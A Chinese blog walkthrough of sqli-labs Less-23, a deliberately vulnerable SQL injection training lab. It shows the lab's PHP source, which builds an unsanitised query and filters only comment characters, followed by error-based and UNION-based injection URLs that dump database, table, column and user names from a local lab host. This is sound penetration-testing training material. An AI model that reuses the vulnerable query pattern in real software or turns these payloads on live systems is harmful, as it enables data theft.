sqli-labs————less 23(高级注入篇)

最新推荐文章于 2024-06-07 07:48:16 发布
最新推荐文章于 2024-06-07 07:48:16 发布
阅读量2k 收藏 2
点赞数 2
分类专栏: 【渗透测试实战】 # Sqli-labs实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80285353
版权

前言

从这一关开始,我们进进入了短暂的高级注入部分,这一部分中将会陆续介绍一些更为巧妙的注入技巧。

Less -23


查看一下源代码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-23 **Error Based- no comments**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

// take the variables 
if(isset($_GET['id']))
{
$id=$_GET['id'];

//filter the comments out so as to comments should not work
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#0000ff">';	
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-23.jpg" /></center>
</body>
</html>
关键的sql执行语句: 
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);

从该SQL语句中我们可以看出如果我们要构造payload那么我们需要做的就是闭合前面的单引号、同时闭合后面的单引号。


获取mysql数据库的basedir:


同时,这里也可以使用报错注入、延时注入:

报错注入:

注入语句:

http://192.168.11.136/sqli-labs/Less-23?id=1'or extractvalue(1,concat(0x7e,database())) or '1'='1

获取数据库信息:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),'3


查看数据库security中的数据表:

注入语句:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3


查看user表中的所有列:

注入语句

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),'3

获取表中信息内容:

注入语句:

http://192.168.11.136/sqli-labs/Less-23?id=-1'union select 1,(select group_concat(username) from security.users limit 0,1),'3


至此,我们完成了一个基本的注入过程。

FLy_鹏程万里
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
SQL注入详解 23-28关
君莫hacker的博客
10-08 663
目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36 Less-23 确定注入类型并判断显示位置 -1' union select 22,33,44 and '1'='1 查看当前数据库 -1' union select 3,database(),3 or '12'='12 爆表 -1' union select 22,group_conca
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23SQLi-LABS Less 23SQLiLABS Less23SQLi Less 23
Sqli-lab教程-史上最全详解(1-22通关)
最新发布
dzqxwzoe的博客
06-07 871
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入
sqli-labs关卡23(基于get提交的过滤注释符的报错注入)
zyh1588的博客
01-15 1103
小白回顾sql靶场23
Sqli-labs之Less-23
→_→
04-18 668
Less-23 基于错误的,过滤注释的GET型 判断注入类型: ?id=1 ?id=1' ?id=1" 发现第二条语句报错: 翻译: 警告:mysql_fetch_array()期望参数1为资源,布尔值在第38行的C:\ phpStudy \ WWW \ sqli ...
sqlilabs less-23
TA不懒,但还没有添加简介
07-12 208
sqlilabs less-23
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
SQLi-LABS Less-23
m0_64898960的博客
04-25 1896
Less-23题目 回到GET注入了,乍一看还以为回到了梦开始的地方…(估计在这里开始学绕过啥的) 尝试==?id=1’== ,结果报错 由报错可知这里存在过滤,手游我们就需要慢慢进行测试看看它过滤了什么 这里#被过滤了,–+也被过滤了,尝试%23 用or ‘1’='1进行闭合,成功回显… 接下来继续进行注入,由于我们使用了or ‘1’='1来结尾,所以这里不能使用order by来查询字段。 如果不能用order by来查询字段,还可以用union来查询。 得到字段数继续进行注入… 得到数据库后
sqli-labs攻关4(Adv)(Less-23~Less-38)
qwzf
11-14 383
前言 总结完最常见的GET型和POST型的联合查询注入、报错注入SQL盲注。于是就继续总结了一些不太常见的SQL注入
less-23
qq_50705755的博客
11-08 87
sql注入
LESS-23 LESS-25 LESS-25a
qq_44598397的博客
03-30 280
LESS-23 源码: 以此可知可以通过报错注入等方式 语法: mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int KaTeX parse error: Expected 'EOF', got '&' at position 19: …it = -1 [, int &̲c...
Less -23
weixin_43745072的博客
11-23 124
Less-23 注释符过滤 首先,在尝试'发现可以注入,但是在尝试注入之后一直报错。并且无论是#还是--+,回显都没有出现,初步判断是注释符过滤了。 查看源码可以看到,#和--+都被替换为了空字符。所以这次要考虑闭合掉引号,构造查询语句。 //filter the comments out so as to comments should not work $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $
通过sqli-labs学习sql注入——进阶挑战之less23-28a
热门推荐
giantbranch的专栏
06-10 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51457142   这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工   通过sqli-la...
sqli-labs(23)
mmzkyl的博客
01-29 267
本关卡是使用 ’ 进行闭合,但是在注释的使用上做了一些限制 先测试下面这两个payload: http://192.168.2.60/sqli-labs/Less-23?id=1'# http://192.168.2.60/sqli-labs/Less-23?id=1'--+ 若是不对输入进行过滤,上面两个payload均是能够返回正常页面,但是测试后发现上述两个payload均无法返回正常页面 # 与 --均被过滤,本题最大的难题便是无法通过注释来注释掉多余的单引号,总而无法完成注入,使用上面两个pay
SQLI-LAB  的 实战记录(Less 21 - Less 30)
这块盾牌有待改良
07-20 5480
Less - 21 Cookie Injection- Error Based- complex - string Less - 22 Cookie Injection- Error Based- Double Quotes - string

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值